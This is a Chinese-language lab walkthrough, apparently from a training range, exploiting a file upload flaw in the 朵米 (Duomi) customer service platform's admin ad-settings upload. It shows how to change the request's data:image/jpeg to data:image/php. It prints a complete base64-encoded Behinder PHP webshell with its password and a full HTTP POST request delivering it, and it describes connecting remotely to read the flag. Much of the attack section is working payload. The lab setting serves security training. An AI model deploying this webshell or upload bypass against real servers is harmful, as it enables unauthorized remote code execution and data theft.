在线靶场
可以通过访问极核官方靶场开启靶机实验:极核靶场 -> 漏洞复现靶场 -> 朵米客服平台
简介
朵米客服平台的系统存在后台任意文件上传漏洞,用户可以通过修改数据包,达到上传PHP文件的目的,并且可以自定义上传内容,从而达到获取WebShell!
漏洞复现
打开首页,点击最上面的注册试用,注册账号后并且登录进入后台。
![图片[1] - 【靶机实战】朵米客服平台 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/05/image-2.png)
![图片[2] - 【靶机实战】朵米客服平台 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/05/image-3.png)
在后台功能点找到文件上传功能点:登录后台 -> 系统设置 -> 广告设置
![图片[3] - 【靶机实战】朵米客服平台 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/05/image-4.png)
点击上传后,先随便上传任意的图片,使用BurpSuite截取数据包,放到重放器模块。
![图片[4] - 【靶机实战】朵米客服平台 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/05/image-5.png)
准备一个WebShell马,然后将WebShell的代码编码为base64,保存备用。这边演示的是使用冰蝎WebShell(哥斯拉、蚁剑都可以),将WebShell进行base64编码,连接密码:sibei
PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZWE5YjJhNzJhMzY0OTRjYyI7IAoJJF9TRVNTSU9OWydrJ109JGtleTsKCXNlc3Npb25fd3JpdGVfY2xvc2UoKTsKCSRwb3N0PWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkKCXsKCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7CgkJJHBvc3Q9JHQoJHBvc3QuIiIpOwoJCQoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewogICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIAkJCX0KCX0KCWVsc2UKCXsKCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsKCX0KICAgICRhcnI9ZXhwbG9kZSgnfCcsJHBvc3QpOwogICAgJGZ1bmM9JGFyclswXTsKICAgICRwYXJhbXM9JGFyclsxXTsKCWNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIF9faW52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpOwo/Pgo=修改上传的数据包,将data:image/jpeg更改为data:image/php,这样上传的文件就是PHP,然后再将base64的内容替换为准备好的WebShell,也就是上传后的文件内容。
POST /service/Settingnow/upload HTTP/1.1
Host: node.hackhub.get-shell.com:53867
Content-Length: 782
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Origin: http://node.hackhub.get-shell.com:53867
Referer: http://node.hackhub.get-shell.com:53867/service/settingnow/index
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4f8ccd621067b5bc1e02e6f3fde3b8d7; service_token=c84f178G6RmBB%252BN3lp2B%252BQXmteoBa2ui97gyLcqn5qNEhVCdUE5vVg
Connection: close
img=data:image/php;base64,PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZWE5YjJhNzJhMzY0OTRjYyI7IAoJJF9TRVNTSU9OWydrJ109JGtleTsKCXNlc3Npb25fd3JpdGVfY2xvc2UoKTsKCSRwb3N0PWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkKCXsKCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7CgkJJHBvc3Q9JHQoJHBvc3QuIiIpOwoJCQoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewogICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIAkJCX0KCX0KCWVsc2UKCXsKCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsKCX0KICAgICRhcnI9ZXhwbG9kZSgnfCcsJHBvc3QpOwogICAgJGZ1bmM9JGFyclswXTsKICAgICRwYXJhbXM9JGFyclsxXTsKCWNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIF9faW52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpOwo/Pgo=![图片[5] - 【靶机实战】朵米客服平台 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/05/image-6.png)
访问上传后的路径,发现成功上传,然后使用冰蝎进行远程连接,成功远程连接。
![图片[6] - 【靶机实战】朵米客服平台 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/05/image-7.png)
![图片[7] - 【靶机实战】朵米客服平台 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/05/image-8.png)
使用冰蝎的文件管理功能,打开根目录 /,发现Flag文件,打开即可。
![图片[8] - 【靶机实战】朵米客服平台 文件上传漏洞复现 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/05/image-9.png)
THE END
暂无评论内容